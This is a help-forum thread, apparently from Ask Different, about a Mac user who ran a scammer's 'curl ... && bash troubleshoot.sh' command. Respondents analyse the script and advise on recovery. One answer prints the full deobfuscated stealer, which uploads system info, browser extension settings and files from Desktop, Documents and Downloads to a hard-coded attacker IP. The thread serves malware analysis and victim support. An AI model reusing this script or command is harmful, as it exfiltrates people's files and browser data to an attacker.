I think I downloaded spyware! I used a curl command in terminal given by a fake support user to download a .sh file
I completely fell for a scammer helping me debug an issue. I ignored all the warnings until it was too late...
I entered the below command in my macbook terminal and it downloaded a .sh file on my computer.
curl -s -O http://REDACTED/pjuWevzu/troubleshoot.sh && bash troubleshoot.sh

What steps should I take to delete the file and remove any spyware?

that shell file (.sh) was a series of commands that could have done ANYTHING to your computer, especially if it ask for your password and you gave it. You could easily look at the file in any text editor (including textedit.app) to get an idea of what it did. But in circumstances like that I would format the Mac and reinstall everything from new, clean, sources. Including your backups that are (hopefully) done before this happened.

The more important question is did you run either/both of the scripts? Downloading a script is harmless; it’s the running of the script that matters.  So, before you start reformatting disks, let’s determine what you did and what the threat actually is

Note that user Creole posted a similar question approximately four before posting here.

@Allan the command they stated above in their post explictly shows execution as the second half of the command with && bash troubleshoot.sh - so yes, they probably did execute the scripts.

You are correct @ThomasWard, it formatted weirdly on my phone and I missed it

How were you put in touch with this scammer? It's also important to go after the social engineering element of this attack. Maybe others can be warned.

There's no need to post the script; I downloaded it. It's a highly obfuscated shell script that seems, most importantly, to do the following.
First, it installs an extension (presumably malicious) in any of several web browsers that are already present.
Second, it tries to send all the files in the Desktop, Documents, and Downloads subfolders of your home folder to the attacker. If you ran this script, you should assume that all those files are compromised, whatever that means to you.
You should also delete all browser extensions and reinstall the ones you want, if any.
Here is the main payload, deobfuscated:
#!/bin/bash
HOST="http://168.100.9.219:3000"
function getInfo() {
    echo "IP address: $(ifconfig | grep "inet " | grep -Fv 127.0.0.1 | awk '{print $2}' || echo 'failed')" >>$TMPDIR/sys_info.txt
    echo "Operating system : $(uname -a || echo 'error'), " >>$TMPDIR/sys_info.txt
    echo "OS version: $(sw_vers -productVersion || echo 'failed')" >>$TMPDIR/sys_info.txt
    echo "OS build: $(sw_vers -buildVersion || echo 'failed')" >>$TMPDIR/sys_info.txt
    echo "Hostname : $(hostname -s || echo 'error'), " >>$TMPDIR/sys_info.txt
    echo "DNS domain : $(hostname -d || echo 'error')" >>$TMPDIR/sys_info.txt
    echo "Fully qualified domain name : $(hostname -f || echo 'error')" >>$TMPDIR/sys_info.txt
    curl -s --output /dev/null -F "theFile=@$TMPDIR/sys_info.txt" "$HOST/upload"
    # cleanup
    rm -rf $TMPDIR/sys_info.txt
}
function getBrowser() {
    browsers=("Google/chrome" "BraveSoftware/Brave-Browser" "Microsoft/Edge" "Yandex/YandexBrowser" "")
    INDEX=0
    for path in "${browsers[@]}"; do
        if [ -n "$(ls -A ~/Library/'Application Support'/$path/ 2>/dev/null)" ]; then
            cd ~/Library/'Application Support'/$path/*/'Local Extension Settings'/
            case $INDEX in
            0)
                zipname="chrome.zip"
                zip -r "$zipname" * >/dev/null 2>&1
                curl -s --output /dev/null -F "theFile=@$zipname" "$HOST/upload"
                rm -rf $zipname
                ;;
            1)
                zipname="brave.zip"
                zip -r "$zipname" * >/dev/null 2>&1
                curl -s --output /dev/null -F "theFile=@$zipname" "$HOST/upload"
                rm -rf $zipname
                ;;
            3)
                zipname="Edge.zip"
                zip -r "$zipname" * >/dev/null 2>&1
                curl -s --output /dev/null -F "theFile=@$zipname" "$HOST/upload"
                rm -rf $zipname
                ;;
            4)
                zipname="Yandex.zip"
                zip -r "$zipname" * >/dev/null 2>&1
                curl -s --output /dev/null -F "theFile=@$zipname" "$HOST/upload"
                rm -rf $zipname
                ;;
            5)
                zipname="other.zip"
                zip -r "$zipname" * >/dev/null 2>&1
                curl -s --output /dev/null -F "theFile=@$zipname" "$HOST/upload"
                rm -rf $zipname
                ;;
            *) ;;
            esac
            let INDEX=${INDEX}+1
        else
            echo "Error locating paths: $path" >>error_log.txt
        fi
    done
}
function getCommons() {
    commons=("Desktop" "Documents" "Downloads")
    TEMPFOLDER=$TMPDIR/commons
    INDEX=0
    for path in "${commons[@]}"; do
        mkdir -p $TEMPFOLDER/$path
        cd ~/$path/
        for file in *; do
            if [ ! -d "$file" ]; then
                zipname="Docs"
                maxsize=2000000
                actualsize=$(wc -c <"$file")
                case $INDEX in 
                0)
                    if [ $actualsize -lt $maxsize ] 
                    then
                        # echo $file
                        cp "$file" $TEMPFOLDER/Desktop >/dev/null 2>&1
                    fi
                    ;;
                1)
                    if [ $actualsize -lt $maxsize ] 
                    then
                        # echo $file
                        cp "$file" $TEMPFOLDER/Documents >/dev/null 2>&1
                    fi
                    ;;
                2)
                    if [ $actualsize -lt $maxsize ] 
                    then
                        # echo $file
                        cp "$file" $TEMPFOLDER/Downloads >/dev/null 2>&1
                    fi
                    ;;
                *) ;;
                esac
            fi
        done
        # count
        let INDEX=${INDEX}+1
        # send and clean up
        cd $TEMPFOLDER/"$path"
        zip -r $TEMPFOLDER/"$path.zip" * >/dev/null 2>&1
        cd $TEMPFOLDER/
        curl -s --output /dev/null -F "theFile=@$path.zip" "$HOST/upload"
        
    done
    # cleanup
    rm -rf $TEMPFOLDER
}
function main() {
        getInfo
        getBrowser
        getCommons
}
main


Maybe I am not reading the script correctly, but I do not see where extensions are being installed or all files in Desktop, Documents, and Downloads are being sent.

I second David's comment. As far as I read it, it is zipping and sending extension settings from the browsers, not installing anything.

@DavidAnderson it seems to copy all files in the three directories, in getCommons.

@nohillside: I wrote bash script based on the one posted in Linc D.'s answer. I used my script to test. Files larger 1999999 bytes and files in the subdirectories contained in Desktop, Documents, and Downloads directories are not copied.

The for file in *; do if [ ! -d "$file" ]; then means non-directory files in the Desktop, Documents, and Downloads folders are sent and nothing in subdirectories. "Local Extension Settings" of the indicated 4 browsers are sent. There's no indication of extensions being installed. But there may be more being done in the original obfuscated code. Note the code inside the download file can be changed at any time after the main victim downloads it from the URL.

@DavidAnderson Thanks for the details, forgot to add „in the directories directly“. But even with the constraints, this can be a lot of sensitive data especially in Desktop and Downloads.

Well, if you add „in the directories directly“, then your comment would still be wrong, because files 2000000 bytes and larger are not copied.

you can reverse hack them and send them garbage

By the way, if anyone's interested, the original malicious script builds and executes another script, which decodes and executes Base64-encoded script, which does the same again, which decodes to a "normal" script. This script displays a fake progress bar and downloads and executes another script, obfuscated in the same way as the original one and Base64-encoded thrice. The final script is the one from this answer.

@Rainb: Hmmm; filling their disk up will at least slow them down. /dev/urandom seems like something to send.

@Rainb, in theory it'd be satisfying, but in practice one would need to spend a non-trivial amount of time to prepare good (i.e. not obviously fake) data. Otherwise it'd be easy for the attacker to filter the garbage (by address, by useragent, by the same pattern in data...).

The link in the post edit history seems to now just result in a redirect to a rickroll video on YouTube.

"There's no need to post the script; I downloaded it.", but what can be downloaded from the given URL might have changed between when the OP did it, and you did it. Or it might depend on the ip/user-agent/..., so you can't really be sure, But the command OP shows, downloads the script first and then executes it, so they should have the actually executed code. A more sophisticated hack would pipe the downloaded content directly to a shell for execution to leave fewer traces of what it did.

@Aeronautix Requesting clarification on the "nothing in subdirectories" part. Do you mean that ~/Downloads/image.jpg would be compromised, but not ~/Downloads/Images/image.jpg? (Not that it matters much - it's bad news either way. I'm just curious about the extent of it.)

@Mentalist Yes, that's what I mean, nothing in subdirectories. if [ ! -d "$file" ]; means non-directory files. And it is also globbing with *, so if the script doesn't have shopt -s dotglob turned on, it also doesn't get your hidden files like ~/.bashrc.

@Henriksupportsthecommunity even worse, I recall someone testing all kinds of methods of presenting a different file whether it is attempted to be downloaded or piped to bash with curl, and they were able to somehow detect even the most advanced ways of "pretending to be curl piping to bash"
Maybe it was wget and not curl, but same thing in this case

I have found the article I was thinking of:
https://web.archive.org/web/20161031205600/https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

@htmlcoderexe: I know that is possible, but that is just another way of changing the script that is downloaded, and a part of the reason I recommend against ever doing curl | sh style commands. But it doesn't matter for this case where the downloading and execution was two separate commands, and doesn't change the fact that in this case we know what was executed. That just shows that sophistications above what I mentioned exists.

Based on analysis by Linc D., but I don't see it doing much changes to the system itself.
Instead, the primary impact is this:
Treat all passwords you have stored in any web browser, all browser history and all active cookies as compromised.
It's probable that a browser master password, if you have any set, will protect the passwords but I wouldn't count on it. You need to change every password that has been saved in your browser, and log out from any sites where you are currently logged in. Well-designed sites invalidate sessions when you change your password, but that is not certain.
Additionally, all files stored in Desktop, Documents and Downloads have been uploaded to the attacker's server.

"All passwords you have stored in any web browser... are compromised"—this assumes that browser passwords are stored in plan text, which I don't believe to be the case

@OionAkif It also depends on where the encryption key comes from. But you may be correct, it seems that at least Chrome uses some system-wide encryption key on Mac.

@OionAkif - I edited it to be a bit more accurate.

I'd still treat all the passwords as compromised and change them. Better safe than sorry.

@OionAkif It doesn't matter if something is stored encrypted rather than plain text if the key is also stored somewhere. As the browser can read and decrypt the passwords to use them on sites, there's no reason the extension can't decrypt them as well.

The OP's question was originally posted at Stack Exchange, where the following image was included. The image shows the output after executing the commands given in the OP's question. (Note: I redacted the IP address originally shown in the OP's image, because the same address has been redacted in the text of the OP's question.)

The green text shown in the image did not come from the curl command or from the script shown in the answer posted by Linc D..

There is no way to determine the content of the troubleshoot.sh script that executed on the OP's Mac.

Various users (including myself) have downloaded the script in an effort to determine the content. (I found the file to not be in Bash script text form.) However, there is no way of knowing if the content of the troubleshoot.sh had been changed since being executed by the OP. Or, if the IP address had been switched to a different computer.
The script shown in Linc D.'s answer takes certain information and leaves nothing behind. Perhaps, that is precisely what the attacker intended for one to think. More could have happened. For example, a background process could have been started which did a more thorough search of the OP's files. Or, based on the OP's sharing settings, other computers could have been infected.
So beyond changing passwords, the OP may consider erasing all volumes mounted when or since the commands were entered. Reinstalling macOS, then reloading files only from backups made before entering the commands. Repeat for any other computers which may have been vulnerable.
